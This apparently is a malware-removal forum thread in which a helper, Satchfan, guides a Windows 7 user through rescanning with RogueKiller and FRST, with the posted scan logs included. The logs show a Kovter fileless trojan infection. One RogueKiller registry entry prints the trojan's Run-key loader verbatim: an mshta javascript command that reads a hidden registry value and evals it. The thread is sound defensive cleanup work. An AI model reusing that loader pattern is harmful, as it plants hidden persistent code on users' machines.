\SystemRoot\system32\DRIVERS\vwifimp.sys
\SystemRoot\system32\DRIVERS\bowser.sys
\SystemRoot\System32\drivers\mpsdrv.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\system32\DRIVERS\mrxsmb10.sys
\SystemRoot\system32\DRIVERS\mrxsmb20.sys
\SystemRoot\system32\drivers\peauth.sys
\SystemRoot\System32\DRIVERS\srvnet.sys
\SystemRoot\System32\drivers\tcpipreg.sys
\SystemRoot\System32\DRIVERS\srv2.sys
\SystemRoot\System32\DRIVERS\srv.sys
\SystemRoot\System32\Drivers\mbamswissarmy.sys
\??\C:\Windows\system32\drivers\mbae64.sys
\SystemRoot\system32\DRIVERS\mwac.sys
\SystemRoot\system32\DRIVERS\farflt.sys
\??\C:\Windows\system32\DRIVERS\mbam.sys
\SystemRoot\system32\DRIVERS\asyncmac.sys
\??\C:\Windows\System32\drivers\truesight.sys
\??\C:\Windows\system32\drivers\3576622E.sys
\Windows\System32\ntdll.dll
\Windows\System32\smss.exe
\Windows\System32\apisetschema.dll
\Windows\System32\autochk.exe
\Windows\System32\difxapi.dll
\Windows\System32\shlwapi.dll
\Windows\System32\shell32.dll
\Windows\System32\user32.dll
\Windows\System32\imm32.dll
\Windows\System32\imagehlp.dll
\Windows\System32\kernel32.dll
\Windows\System32\normaliz.dll
\Windows\System32\ws2_32.dll
———– End ———–
Done!
 
Scan started
Database versions:
  main:    v2019.07.22.08
  rootkit: v2019.07.22.08
 
<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xfffffa8009acb060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
——— Disk Stack ——
DevicePointer: 0xfffffa8009acbb90, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xfffffa8009acb060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xfffffa80076d1950, DeviceName: Unknown, DriverName: \Driver\iaStorF\
DevicePointer: 0xfffffa80071aa5f0, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xfffffa80071b1050, DeviceName: \Device\Ide\IAAStorageDevice-1\, DriverName: \Driver\iaStor\
———— End ———-
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers…
Done!
Drive 0
This is a System drive
Scanning MBR on drive 0…
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: E4B0DEA2
 
Partition information:
 
    Partition 0 type is Primary (0x7)
    Partition is ACTIVE.
    Partition starts at LBA: 2048  Numsec = 204800
    Partition is bootable
    Partition file system is NTFS
 
    Partition 1 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 206848  Numsec = 1953316272
    Partition is not bootable
    Partition file system is NTFS
 
    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable
 
    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable
 
Disk Size: 1000204886016 bytes
Sector size: 512 bytes
 
Done!
Infected: HKU\S-1-5-21-441904776-594677368-125994074-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^ayjqynct –> [Trojan.Fileless.MTGen]
Infected: HKU\S-1-5-21-441904776-594677368-125994074-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^xfhb –> [Trojan.Fileless.MTGen]
Infected: HKU\S-1-5-21-441904776-594677368-125994074-1001_Classes\787e\SHELL\OPEN\COMMAND| –> [Rootkit.Fileless.MTGen]
Infected: HKU\S-1-5-21-441904776-594677368-125994074-1001_Classes\787E\SHELL\OPEN\COMMAND –> [Rootkit.Fileless.MTGen]
Scan Interrupted
Scan was aborted.
Creating System Restore point…
Cleaning up…
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Executing an action cmd.exe…
Success!
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Removal scheduling successful. System shutdown needed.
System shutdown occurred
=======================================
 
 
 
 
 

Unfortunately, the RogueKiller log was one that was run prior to both of the Malwarebytes programmes. I don't think anything will be left but to be sure, please could you run Roguekiller again and post the new log.

 

Thanks

 

Satchfan

RogueKiller Anti-Malware V13.3.2.0 (x64) [Jul 15 2019] (Free) by Adlice Software
mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits
Started in : Normal mode
User : richard [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Signatures : 20190723_195507, Driver : Loaded
Mode : Standard Scan, Scan – Date : 2019/07/24 20:43:17 (Duration : 00:44:09)
Switches : -minimize
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[Tr.Kovter (Malicious)] (file) f2dc.54bc6 – C:\Users\richard\AppData\Local\2b9a\f2dc.54bc6 -> Found
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

Run RogueKiller

IMPORTANT: Do not reboot your computer if at all possible otherwise the malware will reactivate and you will have to run RogueKiller again

  • close all programs
  • double-click RogueKiller.exe - Windows 7/8/10: right-click the program and select Run as Administrator'
  • click on Start Scan
  • when the scan is finished, click on Remove Selected:

Please then run it again and send the new log

================================================

Please run FRST again and make sure there is a checkmark next to ‘Addition.txt’ before you hit Scan.

Logs to include with next post:

New RogueKiller log
New Frst.txt
New Addition.txt


Thanks

Satchfan

 

Rogue Killer log

 

RogueKiller Anti-Malware V13.3.2.0 (x64) [Jul 15 2019] (Free) by Adlice Software
mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits
Started in : Normal mode
User : richard [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Signatures : 20190718_182943, Driver : Loaded
Mode : Standard Scan, Scan – Date : 2019/07/19 19:14:21 (Duration : 00:23:20)
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
>>>>>> O4 - Run
  [Tr.Kovter (Malicious)] (X64) HKEY_USERS\S-1-5-21-441904776-594677368-125994074-1001\Software\Microsoft\Windows\CurrentVersion\Run||ayjqynct – "C:\Windows\system32\mshta.exe" javascript:uTw1jYvh="6qNcFP";Yb67=new%20ActiveXObject("WScript.Shell");i6QpJFt="5KP1uU";xE2hY0=Yb67.RegRead("HKCU\\software\\lwtp\\lvheg");q42IEnR="s";eval(xE2hY0);Wjuje12="RB"; (missing) -> Found
  [Tr.Kovter (Malicious)] (X64) HKEY_USERS\S-1-5-21-441904776-594677368-125994074-1001\Software\Microsoft\Windows\CurrentVersion\Run||xfhb – "C:\Users\richard\AppData\Local\2b9a\f2dc.54bc6" -> Found
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[Tr.Kovter (Malicious)] (file) c721.5fa43 – C:\Users\richard\AppData\Roaming\ed4b\c721.5fa43 -> Found
[Tr.Kovter (Malicious)] (file) f2dc.54bc6 – C:\Users\richard\AppData\Local\2b9a\f2dc.54bc6 -> Found
[Tr.Kovter (Malicious)] (file) 896c.bat – C:\Users\richard\AppData\Local\d3e1\896c.bat -> Found
[Tr.Kovter (Malicious)] (file) 51bf.5fa43 – C:\Users\richard\AppData\Local\d3e1\51bf.5fa43 -> Found
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
>>>>>> Firefox Config
  [PUM.SearchEngine (Potentially Malicious)] browser.search.selectedEngine (C:\Users\richard\AppData\Roaming\Mozilla\Firefox\Profiles\rhtphmuc.default\prefs.js) – Ask Web Search -> Found
 
FRST log
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 15-07-2019 01
Ran by [removed] (administrator) on RICHARD-PC (25-07-2019 20:12:43)
Running from C:\Users\[removed]\Desktop\whatthetech
[removed]
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Adlice -> ) C:\Program Files\RogueKiller\RogueKiller64.exe
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(DTS, Inc. -> DTS, Inc) C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe
(Fitbit, Inc. -> Fitbit, Inc.) [File not signed] C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Intel® Upgrade Service -> Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Malwarebytes Corporation -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Corporation -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows Hardware Compatibility Publisher -> AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Windows Hardware Compatibility Publisher -> AMD) C:\Windows\System32\atiesrxx.exe
(Piriform Ltd -> Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Ralink Technology Corporation -> Ralink Technology, Corp.) C:\Program Files (x86)\Ralink\Common\RaRegistry.exe
(Ralink Technology Corporation -> Ralink Technology, Corp.) C:\Program Files (x86)\Ralink\Common\RaRegistry64.exe
(Webroot Inc. -> Webroot) C:\Program Files\Webroot\WRSA.exe
(Webroot Inc. -> Webroot) C:\Program Files\Webroot\WRSA.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM-x32\…\Run: [WRSVC] => C:\Program Files\Webroot\WRSA.exe [4584344 2019-07-17] (Webroot Inc. -> Webroot)
HKLM\…\Policies\Explorer: [NoViewOnDrive] 0
HKLM\…\Policies\Explorer: [DisableLocalMachineRun] 0
HKLM\…\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKLM\…\Policies\Explorer: [DisableCurrentUserRun] 0
HKLM\…\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKLM\…\Policies\Explorer: [NoViewContextMenu] 0
HKLM\…\Policies\Explorer: [NoShellSearchButton] 0
HKLM\…\Policies\Explorer: [NoFind] 0
HKLM\…\Policies\Explorer: [NoFile] 0
HKLM\…\Policies\Explorer: [HideClock] 0
HKLM\…\Policies\Explorer: [NoTrayContextMenu] 0
HKLM\…\Policies\Explorer: [NoTrayItemsDisplay] 0
HKLM\…\Policies\Explorer: [NoSetFolders] 0
HKLM\…\Policies\Explorer: [NoDevMgrUpdate] 0
HKLM\…\Policies\Explorer: [NoSetTaskbar] 0
HKLM\…\Policies\Explorer: [NoDeletePrinter] 0
HKLM\…\Policies\Explorer: [NoDFSTab] 0
HKLM\…\Policies\Explorer: [NoChangeStartMenu] 0
HKLM\…\Policies\Explorer: [NoLogoff] 0
HKLM\…\Policies\Explorer: [NoWindowsUpdate] 0
HKLM\…\Policies\Explorer: [NoEncryptOnMove] 0
HKLM\…\Policies\Explorer: [NoRunasInstallPrompt] 0
HKLM\…\Policies\Explorer: [NoResolveSearch] 0
HKLM\…\Policies\Explorer: [NoSaveSettings] 0
HKLM\…\Policies\Explorer: [NoHardwareTab] 0
HKLM\…\Policies\Explorer: [NoStartMenuSubFolders] 0
HKLM\…\Policies\Explorer: [NoDesktop] 0
HKU\S-1-5-19\…\Policies\system: [DisableCMD] 0
HKU\S-1-5-19\…\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-19\…\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-19\…\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-19\…\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-19\…\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-19\…\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-19\…\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoFind] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoFile] 0
HKU\S-1-5-19\…\Policies\Explorer: [HideClock] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoStartMenuSubFolders] 0
HKU\S-1-5-20\…\Policies\system: [DisableCMD] 0
HKU\S-1-5-20\…\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-20\…\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-20\…\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-20\…\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-20\…\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-20\…\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-20\…\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoFind] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoFile] 0
HKU\S-1-5-20\…\Policies\Explorer: [HideClock] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoStartMenuSubFolders] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8894680 2016-08-05] (Piriform Ltd -> Piriform Ltd)
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\system: [DisableCMD] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoFind] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoFile] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [HideClock] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoStartMenuSubFolders] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\MountPoints2: {0a44b838-5bea-11e4-990a-60a44c3dd8c8} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\MountPoints2: {5f725559-8e23-11e2-a232-60a44c3dd8c8} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\MountPoints2: {6646635f-85f7-11e3-b40f-60a44c3dd8c8} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\MountPoints2: {74e0c3ad-1f94-11e5-8d4a-60a44c3dd8c8} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\MountPoints2: {f2cd7dbd-84c1-11e2-b5c7-806e6f6e6963} - D:\MCF_MadameFate.exe
HKU\S-1-5-18\…\Policies\system: [DisableCMD] 0
HKU\S-1-5-18\…\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-18\…\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-18\…\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-18\…\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-18\…\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-18\…\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-18\…\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoFind] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoFile] 0
HKU\S-1-5-18\…\Policies\Explorer: [HideClock] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoHardwareTab] 0
